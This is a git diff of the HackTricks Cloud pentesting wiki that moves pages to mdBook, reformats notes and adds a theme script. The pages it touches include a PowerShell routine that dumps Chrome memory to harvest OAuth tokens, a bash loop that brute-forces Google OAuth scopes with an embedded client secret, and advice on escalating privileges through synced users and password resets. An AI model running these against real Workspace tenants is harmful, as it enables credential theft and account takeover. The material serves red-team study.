-Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {   
-    $dumpFile = $_.FullName   
-    $baseName = $_.BaseName 
-    $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"   
-    $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"   
- 
-    Write-Output "Extracting strings from $dumpFile"   
-    & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile   
-    & $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile   
- 
-    $outputFiles = @($asciiStringsFile, $unicodeStringsFile) 
- 
-    foreach ($file in $outputFiles) { 
-        foreach ($regex in $tokenRegexes) { 
- 
-            $matches = Select-String -Path $file -Pattern $regex -AllMatches 
- 
-            $uniqueMatches = @{} 
- 
-            foreach ($matchInfo in $matches) { 
-                foreach ($match in $matchInfo.Matches) { 
-                    $matchValue = $match.Value 
-                    if (-not $uniqueMatches.ContainsKey($matchValue)) { 
-                        $uniqueMatches[$matchValue] = @{ 
-                            LineNumber = $matchInfo.LineNumber 
-                            LineText   = $matchInfo.Line.Trim() 
-                            FilePath   = $matchInfo.Path 
-                        } 
-                    } 
-                } 
-            } 
- 
-            foreach ($matchValue in $uniqueMatches.Keys) { 
-                $info = $uniqueMatches[$matchValue] 
-                Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" 
-            } 
-        } 
- 
-        Write-Output "" 
-    } 
+
+# Dump each Chrome process
+foreach ($processId in $chromeProcesses) {
+    Write-Output "Dumping process with PID: $processId"
+    & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
+}
+
+# Extract strings and search for tokens in each dump
+Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
+    $dumpFile = $_.FullName
+    $baseName = $_.BaseName
+    $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
+    $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
+
+    Write-Output "Extracting strings from $dumpFile"
+    & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
+    & $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
+
+    $outputFiles = @($asciiStringsFile, $unicodeStringsFile)
+
+    foreach ($file in $outputFiles) {
+        foreach ($regex in $tokenRegexes) {
+
+            $matches = Select-String -Path $file -Pattern $regex -AllMatches
+
+            $uniqueMatches = @{}
+
+            foreach ($matchInfo in $matches) {
+                foreach ($match in $matchInfo.Matches) {
+                    $matchValue = $match.Value
+                    if (-not $uniqueMatches.ContainsKey($matchValue)) {
+                        $uniqueMatches[$matchValue] = @{
+                            LineNumber = $matchInfo.LineNumber
+                            LineText   = $matchInfo.Line.Trim()
+                            FilePath   = $matchInfo.Path
+                        }
+                    }
+                }
+            }
+
+            foreach ($matchValue in $uniqueMatches.Keys) {
+                $info = $uniqueMatches[$matchValue]
+                Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
+            }
+        }
+
+        Write-Output ""
+    }
 }
 ```
 
@@ -157,11 +143,10 @@ curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.goo
 
 ### GPS - Scopes
 
-{% hint style="info" %}
-Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
-
-Also, the refresh token is not valid in every application.
-{% endhint %}
+> [!NOTE]
+> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
+>
+> Also, the refresh token is not valid in every application.
 
 By default GPS won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
 
@@ -170,7 +155,7 @@ By default GPS won't have access as the user to every possible OAuth scope, so u
 Bash script to brute-force scopes
 
 ```bash
-curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do 
+curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
     echo -ne "Testing $scope           \r"
     if ! curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
      --data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
@@ -201,21 +186,7 @@ https://www.googleapis.com/auth/admin.directory.user
 
 Which is the same one you get if you don't indicate any scope.
 
-{% hint style="danger" %}
-With this scope you could **modify the password of a existing user to escalate privileges**.
-{% endhint %}
+> [!CAUTION]
+> With this scope you could **modify the password of a existing user to escalate privileges**.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md
similarity index 57%
rename from pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md
rename to src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md
index ddb40cd9f..4f7f7e554 100644
--- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md
+++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md
@@ -1,21 +1,6 @@
 # GWS - Admin Directory Sync
 
-
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -23,17 +8,17 @@ The main difference between this way to synchronize users with GCDS is that GCDS
 
 At the moment of this writing this service is in beta and it supports 2 types of synchronization: From **Active Directory** and from **Azure Entra ID:**
 
-* **Active Directory:** In order to set this up you need to give **access to Google to you Active Directory environment**. And as Google only has access to GCP networks (via **VPC connectors**) you need to create a connector and then make your AD available from that connector by having it in VMs in the GCP network or using Cloud VPN or Cloud Interconnect. Then, you also need to provide **credentials** of an account with read access over the directory and **certificate** to contact via **LDAPS**.
-* **Azure Entra ID:** To configure this it's just needed to **login in Azure with a user with read access** over the Entra ID subscription in a pop-up showed by Google, and Google will keep the token with read access over Entra ID.
+- **Active Directory:** In order to set this up you need to give **access to Google to you Active Directory environment**. And as Google only has access to GCP networks (via **VPC connectors**) you need to create a connector and then make your AD available from that connector by having it in VMs in the GCP network or using Cloud VPN or Cloud Interconnect. Then, you also need to provide **credentials** of an account with read access over the directory and **certificate** to contact via **LDAPS**.
+- **Azure Entra ID:** To configure this it's just needed to **login in Azure with a user with read access** over the Entra ID subscription in a pop-up showed by Google, and Google will keep the token with read access over Entra ID.
 
 Once correctly configured, both options will allow to **synchronize users and groups to Workspace**, but it won't allow to configure users and groups from Workspace to AD or EntraID.
 
 Other options that it will allow during this synchronization are:
 
-* Send an email to the new users to log-in
-* Automatically change their email address to the one used by Workspace. So if Workspace is using `@hacktricks.xyz` and EntraID users use `@carloshacktricks.onmicrosoft.com`, `@hacktricks.xyz` will be used for the users created in the account.
-* Select the **groups containing the users** that will be synced.
-* Select to **groups** to synchronize and create in Workspace (or indicate to synchronize all groups).
+- Send an email to the new users to log-in
+- Automatically change their email address to the one used by Workspace. So if Workspace is using `@hacktricks.xyz` and EntraID users use `@carloshacktricks.onmicrosoft.com`, `@hacktricks.xyz` will be used for the users created in the account.
+- Select the **groups containing the users** that will be synced.
+- Select to **groups** to synchronize and create in Workspace (or indicate to synchronize all groups).
 
 ### From AD/EntraID -> Google Workspace (& GCP)
 
@@ -44,8 +29,8 @@ However, notice that the **passwords** the users might be using in Workspace **c
 
 When the synchronization happens it might synchronize **all the users from AD or only the ones from a specific OU** or only the **users members of specific groups in EntraID**. This means that to attack a synchronized user (or create a new one that gets synchronized) you will need first to figure out which users are being synchronized.
 
-* Users might be **reusing the password or not from AD or EntraID**, but this mean that you will need to **compromise the passwords of the users to login**.
-* If you have access to the **mails** of the users, you could **change the Workspace password of an existing user**, or **create a new user**, wait until it gets synchronized an setup the account.
+- Users might be **reusing the password or not from AD or EntraID**, but this mean that you will need to **compromise the passwords of the users to login**.
+- If you have access to the **mails** of the users, you could **change the Workspace password of an existing user**, or **create a new user**, wait until it gets synchronized an setup the account.
 
 Once you access the user inside Workspace it might be given some **permissions by default**.
 
@@ -53,9 +38,8 @@ Once you access the user inside Workspace it might be given some **permissions b
 
 You also need to figure out first which groups are being synchronized. Although there is the possibility that **ALL** the groups are being synchronized (as Workspace allows this).
 
-{% hint style="info" %}
-Note that even if the groups and memberships are imported into Workspace, the **users that aren't synchronized in the users sychronization won't be created** during groups synchronization even if they are members of any of the groups synchronized.
-{% endhint %}
+> [!NOTE]
+> Note that even if the groups and memberships are imported into Workspace, the **users that aren't synchronized in the users sychronization won't be created** during groups synchronization even if they are members of any of the groups synchronized.
 
 If you know which groups from Azure are being **assigned permissions in Workspace or GCP**, you could just add a compromised user (or newly created) in that group and get those permissions.
 
@@ -70,17 +54,4 @@ Note that Workspace require credentials with read only access over AD or EntraID
 
 I also don't know where does Google store the AD credentials or EntraID token and you **can't recover them re-configuring the synchronizarion** (they don't appear in the web form, you need to give them again). However, from the web it might be possible to abuse the current functionality to **list users and groups**.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/theme/book.js b/theme/book.js
new file mode 100644
index 000000000..1c8d77287
--- /dev/null
+++ b/theme/book.js
@@ -0,0 +1,735 @@
+"use strict";
+
+// Fix back button cache problem
+window.onunload = function () { };
+
+// Global variable, shared between modules
+function playground_text(playground, hidden = true) {
+    let code_block = playground.querySelector("code");
+
+    if (window.ace && code_block.classList.contains("editable")) {
+        let editor = window.ace.edit(code_block);
+        return editor.getValue();
+    } else if (hidden) {
+        return code_block.textContent;
+    } else {
+        return code_block.innerText;
+    }
+}
+
+(function codeSnippets() {
+    function fetch_with_timeout(url, options, timeout = 6000) {
+        return Promise.race([
+            fetch(url, options),
+            new Promise((_, reject) => setTimeout(() => reject(new Error('timeout')), timeout))
+        ]);
+    }
+
+    var playgrounds = Array.from(document.querySelectorAll(".playground"));
+    if (playgrounds.length > 0) {
+        fetch_with_timeout("https://play.rust-lang.org/meta/crates", {
+            headers: {
+                'Content-Type': "application/json",
+            },
+            method: 'POST',
+            mode: 'cors',
+        })
+        .then(response => response.json())
+        .then(response => {
+            // get list of crates available in the rust playground
+            let playground_crates = response.crates.map(item => item["id"]);
+            playgrounds.forEach(block => handle_crate_list_update(block, playground_crates));
+        });
+    }
+
+    function handle_crate_list_update(playground_block, playground_crates) {
+        // update the play buttons after receiving the response
+        update_play_button(playground_block, playground_crates);
+
+        // and install on change listener to dynamically update ACE editors
+        if (window.ace) {
+            let code_block = playground_block.querySelector("code");
+            if (code_block.classList.contains("editable")) {
+                let editor = window.ace.edit(code_block);
+                editor.addEventListener("change", function (e) {
+                    update_play_button(playground_block, playground_crates);
+                });
+                // add Ctrl-Enter command to execute rust code
+                editor.commands.addCommand({
+                    name: "run",
+                    bindKey: {
+                        win: "Ctrl-Enter",
+                        mac: "Ctrl-Enter"
+                    },
+                    exec: _editor => run_rust_code(playground_block)
+                });
+            }
+        }
+    }
+
+    // updates the visibility of play button based on `no_run` class and
+    // used crates vs ones available on https://play.rust-lang.org
+    function update_play_button(pre_block, playground_crates) {
+        var play_button = pre_block.querySelector(".play-button");
+
+        // skip if code is `no_run`
+        if (pre_block.querySelector('code').classList.contains("no_run")) {
+            play_button.classList.add("hidden");
+            return;
+        }
+
+        // get list of `extern crate`'s from snippet
+        var txt = playground_text(pre_block);
+        var re = /extern\s+crate\s+([a-zA-Z_0-9]+)\s*;/g;
+        var snippet_crates = [];
+        var item;
+        while (item = re.exec(txt)) {
+            snippet_crates.push(item[1]);
+        }
+
+        // check if all used crates are available on play.rust-lang.org
+        var all_available = snippet_crates.every(function (elem) {
+            return playground_crates.indexOf(elem) > -1;
+        });
+
+        if (all_available) {
+            play_button.classList.remove("hidden");
+        } else {
+            play_button.classList.add("hidden");
+        }
+    }
+
+    function run_rust_code(code_block) {
+        var result_block = code_block.querySelector(".result");
+        if (!result_block) {
+            result_block = document.createElement('code');
+            result_block.className = 'result hljs language-bash';
+
+            code_block.append(result_block);
+        }
+
+        let text = playground_text(code_block);
+        let classes = code_block.querySelector('code').classList;
+        let edition = "2015";
+        if(classes.contains("edition2018")) {
+            edition = "2018";
+        } else if(classes.contains("edition2021")) {
+            edition = "2021";
+        }
+        var params = {
+            version: "stable",
+            optimize: "0",
+            code: text,
+            edition: edition
+        };
+
+        if (text.indexOf("#![feature") !== -1) {
+            params.version = "nightly";
+        }
+
+        result_block.innerText = "Running...";
+
+        fetch_with_timeout("https://play.rust-lang.org/evaluate.json", {
+            headers: {
+                'Content-Type': "application/json",
+            },
+            method: 'POST',
+            mode: 'cors',
+            body: JSON.stringify(params)
+        })
+        .then(response => response.json())
+        .then(response => {
+            if (response.result.trim() === '') {
+                result_block.innerText = "No output";
+                result_block.classList.add("result-no-output");
+            } else {
+                result_block.innerText = response.result;
+                result_block.classList.remove("result-no-output");
+            }
+        })
+        .catch(error => result_block.innerText = "Playground Communication: " + error.message);
+    }
+
+    // Syntax highlighting Configuration
+    hljs.configure({
+        tabReplace: '    ', // 4 spaces
+        languages: [],      // Languages used for auto-detection
+    });
+
+    let code_nodes = Array
+        .from(document.querySelectorAll('code'))
+        // Don't highlight `inline code` blocks in headers.
+        .filter(function (node) {return !node.parentElement.classList.contains("header"); });
+
+    if (window.ace) {
+        // language-rust class needs to be removed for editable
+        // blocks or highlightjs will capture events
+        code_nodes
+            .filter(function (node) {return node.classList.contains("editable"); })
+            .forEach(function (block) { block.classList.remove('language-rust'); });
+
+        code_nodes
+            .filter(function (node) {return !node.classList.contains("editable"); })
+            .forEach(function (block) { hljs.highlightBlock(block); });
+    } else {
+        code_nodes.forEach(function (block) { hljs.highlightBlock(block); });
+    }
+
+    // Adding the hljs class gives code blocks the color css
+    // even if highlighting doesn't apply
+    code_nodes.forEach(function (block) { block.classList.add('hljs'); });
+
+    Array.from(document.querySelectorAll("code.hljs")).forEach(function (block) {
+
+        var lines = Array.from(block.querySelectorAll('.boring'));
+        // If no lines were hidden, return
+        if (!lines.length) { return; }
+        block.classList.add("hide-boring");
+
+        var buttons = document.createElement('div');
+        buttons.className = 'buttons';
+        buttons.innerHTML = "";
+
+        // add expand button
+        var pre_block = block.parentNode;
+        pre_block.insertBefore(buttons, pre_block.firstChild);
+
+        pre_block.querySelector('.buttons').addEventListener('click', function (e) {
+            if (e.target.classList.contains('fa-eye')) {
+                e.target.classList.remove('fa-eye');
+                e.target.classList.add('fa-eye-slash');
+                e.target.title = 'Hide lines';
+                e.target.setAttribute('aria-label', e.target.title);
+
+                block.classList.remove('hide-boring');
+            } else if (e.target.classList.contains('fa-eye-slash')) {
+                e.target.classList.remove('fa-eye-slash');
+                e.target.classList.add('fa-eye');
+                e.target.title = 'Show hidden lines';
+                e.target.setAttribute('aria-label', e.target.title);
+
+                block.classList.add('hide-boring');
+            }
+        });
+    });
+
+    if (window.playground_copyable) {
+        Array.from(document.querySelectorAll('pre code')).forEach(function (block) {
+            var pre_block = block.parentNode;
+            if (!pre_block.classList.contains('playground')) {
+                var buttons = pre_block.querySelector(".buttons");
+                if (!buttons) {
+                    buttons = document.createElement('div');
+                    buttons.className = 'buttons';
+                    pre_block.insertBefore(buttons, pre_block.firstChild);
+                }
+
+                var clipButton = document.createElement('button');
+                clipButton.className = 'clip-button';
+                clipButton.title = 'Copy to clipboard';
+                clipButton.setAttribute('aria-label', clipButton.title);
+                clipButton.innerHTML = '';
+
+                buttons.insertBefore(clipButton, buttons.firstChild);
+            }
+        });
+    }
+
+    // Process playground code blocks
+    Array.from(document.querySelectorAll(".playground")).forEach(function (pre_block) {
+        // Add play button
+        var buttons = pre_block.querySelector(".buttons");
+        if (!buttons) {
+            buttons = document.createElement('div');
+            buttons.className = 'buttons';
+            pre_block.insertBefore(buttons, pre_block.firstChild);
+        }
+
+        var runCodeButton = document.createElement('button');
+        runCodeButton.className = 'fa fa-play play-button';
+        runCodeButton.hidden = true;
+        runCodeButton.title = 'Run this code';
+        runCodeButton.setAttribute('aria-label', runCodeButton.title);
+
+        buttons.insertBefore(runCodeButton, buttons.firstChild);
+        runCodeButton.addEventListener('click', function (e) {
+            run_rust_code(pre_block);
+        });
+
+        if (window.playground_copyable) {
+            var copyCodeClipboardButton = document.createElement('button');
+            copyCodeClipboardButton.className = 'clip-button';
+            copyCodeClipboardButton.innerHTML = '';
+            copyCodeClipboardButton.title = 'Copy to clipboard';
+            copyCodeClipboardButton.setAttribute('aria-label', copyCodeClipboardButton.title);
+
+            buttons.insertBefore(copyCodeClipboardButton, buttons.firstChild);
+        }
+
+        let code_block = pre_block.querySelector("code");
+        if (window.ace && code_block.classList.contains("editable")) {
+            var undoChangesButton = document.createElement('button');
+            undoChangesButton.className = 'fa fa-history reset-button';
+            undoChangesButton.title = 'Undo changes';
+            undoChangesButton.setAttribute('aria-label', undoChangesButton.title);
+
+            buttons.insertBefore(undoChangesButton, buttons.firstChild);
+
+            undoChangesButton.addEventListener('click', function () {
+                let editor = window.ace.edit(code_block);
+                editor.setValue(editor.originalCode);
+                editor.clearSelection();
+            });
+        }
+    });
+})();
+
+(function themes() {
+    var html = document.querySelector('html');
+    // var themeToggleButton = document.getElementById('theme-toggle');
+    var themeBtns = document.getElementById('theme-btns');
+    var themeColorMetaTag = document.querySelector('meta[name="theme-color"]');
+    var themeIds = [];
+    themeBtns.querySelectorAll('button.theme').forEach(function (el) {
+        themeIds.push(el.id);
+    });
+    var stylesheets = {
+        ayuHighlight: document.querySelector("[href$='ayu-highlight.css']"),
+        tomorrowNight: document.querySelector("[href$='tomorrow-night.css']"),
+        highlight: document.querySelector("[href$='highlight.css']"),
+    };
+
+    // function showThemes() {
+    //     themePopup.style.display = 'block';
+    //     themeToggleButton.setAttribute('aria-expanded', true);
+    //     themePopup.querySelector("button#" + get_theme()).focus();
+    // }
+
+    function updateThemeSelected() {
+        themeBtns.querySelectorAll('.theme-selected').forEach(function (el) {
+            el.classList.remove('theme-selected');
+        });
+        themeBtns.querySelector("button#" + get_theme()).classList.add('theme-selected');
+    }
+
+    // function hideThemes() {
+    //     themePopup.style.display = 'none';
+    //     themeToggleButton.setAttribute('aria-expanded', false);
+    //     themeToggleButton.focus();
+    // }
+
+    function get_theme() {
+        var theme;
+        try { theme = localStorage.getItem('mdbook-theme'); } catch (e) { }
+        if (theme === null || theme === undefined || !themeIds.includes(theme)) {
+            return default_theme;
+        } else {
+            return theme;
+        }
+    }
+
+    function set_theme(theme, store = true) {
+        let ace_theme;
+
+        if (theme == 'coal' || theme == 'navy' || theme == 'hacktricks-dark') {
+            stylesheets.ayuHighlight.disabled = true;
+            stylesheets.tomorrowNight.disabled = false;
+            stylesheets.highlight.disabled = true;
+            ace_theme = "ace/theme/tomorrow_night";
+        } else if (theme == 'ayu') {
+            stylesheets.ayuHighlight.disabled = false;
+            stylesheets.tomorrowNight.disabled = true;
+            stylesheets.highlight.disabled = true;
+            ace_theme = "ace/theme/tomorrow_night";
+        } else {
+            stylesheets.ayuHighlight.disabled = true;
+            stylesheets.tomorrowNight.disabled = true;
+            stylesheets.highlight.disabled = false;
+            ace_theme = "ace/theme/dawn";
+        }
+
+        setTimeout(function () {
+            themeColorMetaTag.content = getComputedStyle(document.documentElement).backgroundColor;
+        }, 1);
+
+        if (window.ace && window.editors) {
+            window.editors.forEach(function (editor) {
+                editor.setTheme(ace_theme);
+            });
+        }
+
+        var previousTheme = get_theme();
+
+        if (store) {
+            try { localStorage.setItem('mdbook-theme', theme); } catch (e) { }
+        }
+
+        html.classList.remove(previousTheme);
+        html.classList.add(theme);
+        updateThemeSelected();
+    }
+
+    // Set theme
+    var theme = get_theme();
+
+    set_theme(theme, false);
+
+    // themeToggleButton.addEventListener('click', function () {
+    //     if (themePopup.style.display === 'block') {
+    //         hideThemes();
+    //     } else {
+    //         showThemes();
+    //     }
+    // });
+
+    themeBtns.addEventListener('click', function (e) {
+        var theme;
+        if (e.target.className === "theme") {
+            theme = e.target.id;
+        } else if (e.target.parentElement.className === "theme") {
+            theme = e.target.parentElement.id;
+        } else {
+            return;
+        }
+        if (theme == "default-theme"){
+            theme = default_theme
+        }
+        set_theme(theme);
+    });
+
+    // themePopup.addEventListener('focusout', function(e) {
+    //     // e.relatedTarget is null in Safari and Firefox on macOS (see workaround below)
+    //     if (!!e.relatedTarget && !themeToggleButton.contains(e.relatedTarget) && !themePopup.contains(e.relatedTarget)) {
+    //         hideThemes();
+    //     }
+    // });
+
+    // Should not be needed, but it works around an issue on macOS & iOS: https://github.com/rust-lang/mdBook/issues/628
+    // document.addEventListener('click', function(e) {
+    //     if (themePopup.style.display === 'block' && !themeToggleButton.contains(e.target) && !themePopup.contains(e.target)) {
+    //         hideThemes();
+    //     }
+    // });
+
+    // document.addEventListener('keydown', function (e) {
+    //     if (e.altKey || e.ctrlKey || e.metaKey || e.shiftKey) { return; }
+    //     if (!themePopup.contains(e.target)) { return; }
+
+    //     switch (e.key) {
+    //         case 'Escape':
+    //             e.preventDefault();
+    //             hideThemes();
+    //             break;
+    //         case 'ArrowUp':
+    //             e.preventDefault();
+    //             var li = document.activeElement.parentElement;
+    //             if (li && li.previousElementSibling) {
+    //                 li.previousElementSibling.querySelector('button').focus();
+    //             }
+    //             break;
+    //         case 'ArrowDown':
+    //             e.preventDefault();
+    //             var li = document.activeElement.parentElement;
+    //             if (li && li.nextElementSibling) {
+    //                 li.nextElementSibling.querySelector('button').focus();
+    //             }
+    //             break;
+    //         case 'Home':
+    //             e.preventDefault();
+    //             themePopup.querySelector('li:first-child button').focus();
+    //             break;
+    //         case 'End':
+    //             e.preventDefault();
+    //             themePopup.querySelector('li:last-child button').focus();
+    //             break;
+    //     }
+    // });
+})();
+
+(function sidebar() {
+    var body = document.querySelector("body");
+    var sidebar = document.getElementById("sidebar");
+    var sidebarLinks = document.querySelectorAll('#sidebar a');
+    var sidebarToggleButton = document.getElementById("sidebar-toggle");
+    // var sidebarResizeHandle = document.getElementById("sidebar-resize-handle");
+    var firstContact = null;
+
+    function showSidebar() {
+        html.classList.remove('sidebar-hidden')
+        html.classList.add('sidebar-visible');
+        body.classList.remove('sidebar-hidden')
+        body.classList.add('sidebar-visible');
+        Array.from(sidebarLinks).forEach(function (link) {
+            link.setAttribute('tabIndex', 0);
+        });
+        sidebarToggleButton.setAttribute('aria-expanded', true);
+        sidebar.setAttribute('aria-hidden', false);
+        try { localStorage.setItem('mdbook-sidebar', 'visible'); } catch (e) { }
+    }
+
+    function hideSidebar() {
+        html.classList.remove('sidebar-visible')
+        html.classList.add('sidebar-hidden');
+        body.classList.remove('sidebar-visible')
+        body.classList.add('sidebar-hidden');
+        Array.from(sidebarLinks).forEach(function (link) {
+            link.setAttribute('tabIndex', -1);
+        });
+        sidebarToggleButton.setAttribute('aria-expanded', false);
+        sidebar.setAttribute('aria-hidden', true);
+        try { localStorage.setItem('mdbook-sidebar', 'hidden'); } catch (e) { }
+    }
+
+    // Toggle sidebar
+    sidebarToggleButton.addEventListener('click', function sidebarToggle() {
+        if (body.classList.contains("sidebar-hidden")) {
+            var current_width = parseInt(
+                document.documentElement.style.getPropertyValue('--sidebar-width'), 10);
+            if (current_width < 150) {
+                document.documentElement.style.setProperty('--sidebar-width', '150px');
+            }
+            showSidebar();
+        } else if (body.classList.contains("sidebar-visible")) {
+            hideSidebar();
+        } else {
+            if (getComputedStyle(sidebar)['transform'] === 'none') {
+                hideSidebar();
+            } else {
+                showSidebar();
+            }
+        }
+    });
+
+    // sidebarResizeHandle.addEventListener('mousedown', initResize, false);
+
+    function initResize(e) {
+        window.addEventListener('mousemove', resize, false);
+        window.addEventListener('mouseup', stopResize, false);
+        body.classList.add('sidebar-resizing');
+    }
+    function resize(e) {
+        var pos = (e.clientX - sidebar.offsetLeft);
+        if (pos < 20) {
+            hideSidebar();
+        } else {
+            if (body.classList.contains("sidebar-hidden")) {
+                showSidebar();
+            }
+            pos = Math.min(pos, window.innerWidth - 100);
+            document.documentElement.style.setProperty('--sidebar-width', pos + 'px');
+        }
+    }
+    //on mouseup remove windows functions mousemove & mouseup
+    function stopResize(e) {
+        body.classList.remove('sidebar-resizing');
+        window.removeEventListener('mousemove', resize, false);
+        window.removeEventListener('mouseup', stopResize, false);
+    }
+
+    document.addEventListener('touchstart', function (e) {
+        firstContact = {
+            x: e.touches[0].clientX,
+            time: Date.now()
+        };
+    }, { passive: true });
+
+    document.addEventListener('touchmove', function (e) {
+        if (!firstContact)
+            return;
+
+        var curX = e.touches[0].clientX;
+        var xDiff = curX - firstContact.x,
+            tDiff = Date.now() - firstContact.time;
+
+        if (tDiff < 250 && Math.abs(xDiff) >= 150) {
+            if (xDiff >= 0 && firstContact.x < Math.min(document.body.clientWidth * 0.25, 300))
+                showSidebar();
+            else if (xDiff < 0 && curX < 300)
+                hideSidebar();
+
+            firstContact = null;
+        }
+    }, { passive: true });
+})();
+
+(function menubarCollapse() {
+    var menubarCollapseToggleButton = document.getElementById('menubar-collapse-toggle');
+    var menubarCollapsePopup = document.getElementById('menubar-collapse-popup');
+
+    function showCollapse() {
+        menubarCollapsePopup.style.display = 'flex';
+        menubarCollapseToggleButton.setAttribute('aria-expanded', true);
+    }
+
+    function hideCollapse() {
+        menubarCollapsePopup.style.display = 'none';
+        menubarCollapseToggleButton.setAttribute('aria-expanded', false);
+        menubarCollapseToggleButton.focus();
+    }
+
+    menubarCollapseToggleButton.addEventListener('click', function () {
+        if (menubarCollapsePopup.style.display === 'flex') {
+            hideCollapse();
+        } else {
+            showCollapse();
+        }
+    });
+
+    menubarCollapsePopup.addEventListener('focusout', function(e) {
+        // e.relatedTarget is null in Safari and Firefox on macOS (see workaround below)
+        if (!!e.relatedTarget && !menubarCollapseToggleButton.contains(e.relatedTarget) && !menubarCollapsePopup.contains(e.relatedTarget)) {
+            hideCollapse();
+        }
+    });
+
+    // Should not be needed, but it works around an issue on macOS & iOS: https://github.com/rust-lang/mdBook/issues/628
+    document.addEventListener('click', function(e) {
+        if (menubarCollapsePopup.style.display === 'block' && !menubarCollapseToggleButton.contains(e.target) && !menubarCollapsePopup.contains(e.target)) {
+            hideCollapse();
+        }
+    });
+})();
+
+(function chapterNavigation() {
+    document.addEventListener('keydown', function (e) {
+        if (e.altKey || e.ctrlKey || e.metaKey || e.shiftKey) { return; }
+        if (window.search && window.search.hasFocus()) { return; }
+        var html = document.querySelector('html');
+
+        function next() {
+            var nextButton = document.querySelector('.nav-chapters.next');
+            if (nextButton) {
+                window.location.href = nextButton.href;
+            }
+        }
+        function prev() {
+            var previousButton = document.querySelector('.nav-chapters.previous');
+            if (previousButton) {
+                window.location.href = previousButton.href;
+            }
+        }
+        switch (e.key) {
+            case 'ArrowRight':
+                e.preventDefault();
+                if (html.dir == 'rtl') {
+                    prev();
+                } else {
+                    next();
+                }
+                break;
+            case 'ArrowLeft':
+                e.preventDefault();
+                if (html.dir == 'rtl') {
+                    next();
+                } else {
+                    prev();
